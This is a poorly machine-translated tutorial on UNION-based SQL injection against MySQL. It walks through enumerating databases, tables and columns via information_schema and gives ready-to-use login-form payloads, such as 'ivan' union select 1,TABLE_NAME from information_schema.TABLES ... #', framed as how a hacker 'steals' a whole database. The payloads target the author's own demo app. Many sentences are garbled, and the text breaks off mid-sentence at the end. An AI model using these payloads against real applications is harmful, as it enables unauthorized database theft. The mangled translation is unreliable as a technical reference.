How to use SQL Injection for database explosion, SQL Injection for database explosion
What can SQL injection do?
I introduced the basic principles and experimental methods of SQL Injection in "SQL Injection basics". Next I will ask what SQL injection can do?
It is estimated that many of my friends think that using SQL injection can only obtain all records in the current table, but cannot obtain the content of other tables. Is this true?
Just as a thief crawled into the room from the window, could he only steal from the room? No, he can raster the entire house.
Don't believe it? Let's take a look at how to crack the MySQL database.
How to root a MySQL database
If you are a hacker and cannot know which tables and fields are in the system, how can you steal the database content?
The answer is that MySQL Data hasMetabaseIt will describe the databases of the entire MySQL server, the tables of each data, and the fields of each table. This is equivalent to telling others all the treasures of the house.
Then the metadatabase is a root, as long as you grasp the basis, along the following:
Metadatabase-> database list-> table list-> Field List-> table content
This tree-layered retrieval order can steal all the contents of the database. The following is a demonstration.
Where is the metadatabase?
I mentioned that MySQL has a metadatabase, but where is it hidden? Please log on to the MySQL database and runshow databases;
To obtain the list of all databases, as shown in:
Database marked in red in the imageinformation_schema
It is the metadatabase, which has all its applications and can be used to explore the original land.
Enterinformation_schema
Database:
The root of what we call isSCHEMATA
Table, which describes all the databases in MySQL.
Then ReuseTABLES
Table, you can see the table name under the data, ReuseCOLUMNS
Table, you can see the field names under each table. The following shows how to view the data in sequence.
View All databases
The SCHEMATA table describes all the database information. Only the standard select statement is required:
SELECT * FROM information_schema.SCHEMATA
To display all the contents of the table:
Please note that you will not access the table after entering a database from here, but will use<Database Name>. <Table Name>To access tables in a database. The precedinginformation_schema.SCHEMATA
Queriesinformation_schema
Under the databaseSCHEMATA
Table.
FigureSCHEMA_NAME
The field is the database name. The query result shows that the MySQL server has five databases.
View table
With the Database List, You can further view all tables in a database (you can also view all tables in all databases ). For examplelyt_test
For all tables in the database, use the SQL statement:
SELECT TABLE_SCHEMA, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'lyt_test'
Shows the query result:
TABLE_NAME
Table Name, left columnTABLE_SCHEMA
It is the database name. Because only the accounts table is in the lyt_test database, only one column is output.
View all fields in the table
Then, the COLUMNS table can be used to query all the fields in the table. The following SQL statement can be used to query all fields in the accounts table.Field nameAndType:
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE FROM information_schema.COLUMNS WHERE TABLE_NAME = 'accounts'
Shows all fields and types in the accounts table:
View all records in the table
Viewing the content in the accounts table is even more a piece of cake. Anyone who has learned the database knows that the SQL statements are written as follows:
SELECT * FROM lyt_test.accounts
The result is as follows:
Now, I believe you have learned how to steal all the database content from MySQL.
Seek pivot points
A great physicist, amoumid, once said:
Give me a pivot. I can pick up the whole earth.
The previous section introduces how to design MySQL Data through metadatabase without knowing how to design MySQL Data.informatio_schema
Step by step, the entire database content is stolen.
So how can we use SQL injection to steal the entire database?, This is what you are lookingFULCRUM.
Do you still remember the experiment introduced in the previous article? Using SQL injection technology, all data in the userinfo table can be stolen. However, onlyWHERE
Part, whileSELECT ... FROM ...
Some fields and table names cannot be injected. How can we steal data from other tables?
This secret is used.UNION
Statement. Yes, standard SQL providesUNION
Statement.SELECT
The result is combined (that is, for twoSELECT
Result set ).UNION
The statement syntax is as follows:
SELECT column_name1(s) FROM table_name1UNIONSELECT column_name2(s) FROM table_name2
The only requirement is two.SELECT
The number of columns in the statement must be equal.
WithUNION
Statement, you can setSELECT * from userinfo WHERE ...
AndSELECT * from lyt_test.accounts
Combine the two results.
Etc. As a hacker, I didn't get the source code. How can I know?SELECT * from userinfo
How many columns does the query result have?
Obviously I don't know, but you can useTest MethodGet this value: inject in sequenceUNION SELECT 1, ... N
Such a statement to test. First trySELECT 1
, AgainSELECT 1,2
, And thenSELECT 1,2,3
Until no running error occurs. You can test it on MySQL first. The result is as follows:
From the test results, we can seeSELECT
The result must be two columns; otherwise, an error occurs.
By the way, remember to injectWHERE
Are there two conditions? (Name = 'name' ANDpasswd = 'passswd '), it may be a more complex condition in the actual code, or even difficult for hackers to guess.UNION
Which variable should I insert? Make the entire SQL statement a legal query statement.
The best security method isUNION SELECT ...
Inject to the first variable, and then addAnnotator, Comment out the subsequent statements without considering the following statements. In the MySQL database, use#
Symbol.
If you have said so much, you can perform an injection test to verify it:
Inusername
Enter in the text box:ivan' union select 1,2#
Such:
Pointlogin
Shows the running result after the button:
NoteSQL
Statement:
SELECT * FROM userinfo WHERE name = ‘ivan’ union select 1,2# AND passwd = ”
#
Comment out the following SQL content. MySQL will directly kill it during parsing, which is equivalent to the following SQL statement:
SELECT * FROM userinfo WHERE name = ‘ivan’ union select 1,2
The result of select 1 and 2 isConstant rowIn the following example, we try to query data from the table, not completely a constant row.
Okay,UNION
And#
Is the pivot of the database.
Practice Database explosion
Everything is ready.. Then let the wind blow up, blow more violent.
The following experiments are based on the database application demo developed in "SQL Injection basics". If you do not have basic knowledge about SQL injection, read this article; at the same time, it is recommended that SQL Injection beginners build the same data application demo in this article to experiment and test it.
Database explosion list
Tousername
Medium injection:
ivan’ union select 1,SCHEMA_NAME from information_schema.SCHEMATA #
You can query the list of all databases, for example:
The database list is displayed in the red box. InUNION SELECT ...
In the statement, the first column is constant 1, and the second column is the SCHEMA_NAME column in The information_schema.SCHEMATA table, which is just the database name.
Name of all tables in a database
To reduce the output result, only the table name in the lyt_test database is exposed.username
Medium injection:
ivan’ union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = ‘lyt_test’#
You can query all the tables in the lyt_test database, as shown in:
The difference is that there is only one accounts table in the lyt_test database, and the other has the same principle as that in the database burst, which is not explained in detail.
Blow all fields in a table
Only all fields in the accounts table are exposed.username
Medium injection:
ivan’ union select 1, COLUMN_NAME from information_schema.COLUMNS WHERE TABLE_NAME = ‘accounts’ #
The result is shown in:
The field name is highlighted in red. What about the type? Modify the injection content:
ivan’ union select 1, DATA_TYPE from information_schema.COLUMNS WHERE TABLE_NAME = ‘accounts’ #
You can obtain the field type information, as shown in:
The marked red is the type of the first two fields, that isID
Type:char
,balance
Type:float
.
From the above we can find the rule:Each injection can obtain each list of data in the target table.If there are N tables in the table, you can obtain the complete table information by injecting N times.
Blow all records in a table
It is not written here. You can practice it yourself. It is exactly the same as above.
Summary
It was so easy to inject SQL statements into database explosion, but there are several necessary conditions
Have you mastered the essence of database explosion? Come and try.
Note: This article